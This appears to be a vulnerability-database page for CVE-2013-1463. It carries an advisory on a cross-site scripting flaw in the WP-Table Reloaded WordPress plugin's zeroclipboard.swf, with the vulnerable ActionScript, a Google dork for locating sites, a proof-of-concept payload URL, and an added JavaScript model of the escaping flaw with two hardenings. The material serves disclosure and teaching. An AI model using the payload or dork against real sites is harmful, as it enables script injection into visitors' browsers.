| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2013-1463 | 24 Jan 2013 00:00 | – | circl |
| CVE-2013-1463 | 7 Feb 2013 02:00 | – | cve |
| CVE-2013-1463 | 7 Feb 2013 02:00 | – | cvelist |
| EUVD-2013-1499 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2013-1463 | 7 Feb 2013 05:56 | – | nvd |
| WordPress WP Table Reloaded Plugin - Cross Site Scripting | 24 Jan 2013 00:00 | – | patchstack |
| Cross site scripting | 7 Feb 2013 05:56 | – | prion |
| Cross site scripting | 2 Apr 2013 03:23 | – | prion |
| PT-2013-3149 · WordPress +1 · Wp-Table Reloaded | 7 Feb 2013 00:00 | – | ptsecurity |
| stapler-adjunct-zeroclipboard: XSS via copying XSS payload into buffer | 9 Jul 2013 18:57 | – | redhat |
```text
# Exploit Title: WordPress wp-table-reloaded plugin cross-site scripting in SWF
# Release Date: 24/01/13
# Author: hip [Insight-Labs]
# Contact: [email protected] | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.org/plugin/wp-table-reloaded.latest-stable.zip
# Vendor Homepage: http://tobias.baethge.com/
# Tested on: Windows XP SP3
# Affected versions: before 1.9.4
# Google Dork: inurl:/wp-content/plugins/wp-table-reloaded/
-----------------------------------------------------------------------------------------------------------------------
# Introduction:
WP-Table Reloaded enables you to create and manage tables
without having to write HTML code, and it adds valuable functions for your visitors.
-------------------------------------------------------------------------------------------------------------------------
# XSS - Proof Of Concept:
Vulnerable path:
/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf
Vulnerable parameter: id
Piece of code (ActionScript):
flashvars = LoaderInfo(this.root.loaderInfo).parameters;
this.domId = flashvars.id; <-- vulnerable input: read from the SWF's query string without validation
ExternalInterface.call("ZeroClipboard.dispatch", domId, "mouseOver", null); <-- vulnerable call: the id is interpolated into the JavaScript the Flash bridge evaluates in the hosting page
POC:
/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
-------------------------------------------------------------------------------------------------------------------------
# Patch:
-- Vendor was notified on 23/01/2013
-- Vendor released version 1.9.4 on 27/01/2013, which fixed the bug
-- Reward: 50 USD from White Fir Design on 30/01/2013
-------------------------------------------------------------------------------------------------------------------------
```
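The following JavaScript is an added example; it is not code from the advisory, from WP-Table Reloaded or from ZeroClipboard. It models how the legacy Flash ExternalInterface bridge turned the `ExternalInterface.call(...)` shown above into JavaScript evaluated in the hosting page (assumed wrapper text and escaping rule: the bridge escaped `"` as `\"` but left `\` alone), runs the advisory's URL-decoded `id` value through that model to show why the breakout works, and then shows two hardenings of my own, an id allow-list and backslash escaping. Neither is the vendor's 1.9.4 patch, which this page does not show; all function names are mine.

```javascript
// Added example (not from the advisory, the plugin or ZeroClipboard).
// Assumption: the Flash bridge evaluated
//   try { __flash__toXML(fn(args)) ; } catch (e) { "<undefined/>"; }
// and, for string arguments, escaped only the double quote.

// Serialise one argument the way the modelled Flash bridge did.
function flashSerialiseArg(arg) {
  if (arg === null || arg === undefined) return "null";
  if (typeof arg === "string") {
    // Root cause: `\"` in the input becomes `\\"` in the output, i.e. an
    // escaped backslash followed by a quote that closes the string literal.
    return '"' + arg.replace(/"/g, '\\"') + '"';
  }
  return String(arg);
}

// JS text the bridge evaluates for ExternalInterface.call(fn, ...args).
function buildBridgeCall(fn, args) {
  return "try { __flash__toXML(" + fn + "(" +
    args.map(flashSerialiseArg).join(",") +
    ")) ; } catch (e) { \"<undefined/>\"; }";
}

// Run the generated script in a small sandbox that records what happened.
// hasClient models whether ZeroClipboard.js is loaded on the hosting page;
// the PoC requests the .swf directly, so on that page it is not, and the
// reference to ZeroClipboard throws, which is exactly what the payload's
// injected catch block relies on.
function runBridgeCall(script, hasClient) {
  const log = { dispatched: [], alerts: [] };
  const env = {
    __flash__toXML: (v) => v,
    alert: (x) => log.alerts.push(x),
  };
  if (hasClient) {
    env.ZeroClipboard = {
      dispatch: (id, ev, a) => log.dispatched.push([id, ev, a]),
    };
  }
  new Function(...Object.keys(env), script)(...Object.values(env));
  return log;
}

// The id= value from the advisory's PoC URL, URL-decoded.
const POC_ID = decodeURIComponent("a\\%22%29%29}catch%28e%29{alert%281%29}//");

// Vulnerable behaviour (modelled): flashvars.id goes straight into the call.
function vulnerableMouseOver(id, hasClient) {
  const script = buildBridgeCall("ZeroClipboard.dispatch", [id, "mouseOver", null]);
  return runBridgeCall(script, hasClient);
}

// Hardening 1 (my suggestion): only accept values that look like DOM ids.
function safeDomId(id) {
  return /^[A-Za-z0-9_-]+$/.test(id) ? id : null;
}

function hardenedMouseOver(id, hasClient) {
  const domId = safeDomId(id);
  if (domId === null) return { dispatched: [], alerts: [], rejected: true };
  const script = buildBridgeCall("ZeroClipboard.dispatch", [domId, "mouseOver", null]);
  return runBridgeCall(script, hasClient);
}

// Hardening 2 (my suggestion): escape backslashes so the bridge's own quote
// escaping can no longer be undone; the payload stays inside the literal.
function escapeBackslashes(id) {
  return id.replace(/\\/g, "\\\\");
}

function escapedMouseOver(id, hasClient) {
  const script = buildBridgeCall("ZeroClipboard.dispatch",
    [escapeBackslashes(id), "mouseOver", null]);
  return runBridgeCall(script, hasClient);
}

// Stand-alone run: node this_file.js
console.log(vulnerableMouseOver(POC_ID, false)); // alerts: [1]
console.log(hardenedMouseOver(POC_ID, false));   // rejected: true
console.log(escapedMouseOver(POC_ID, true));     // dispatched with the raw string, no alert
```

The allow-list is the stronger of the two: a DOM id never legitimately contains quotes, backslashes or braces, so rejecting everything outside `[A-Za-z0-9_-]` removes the whole class of bridge-injection problems rather than the one escaping gap the PoC exploits.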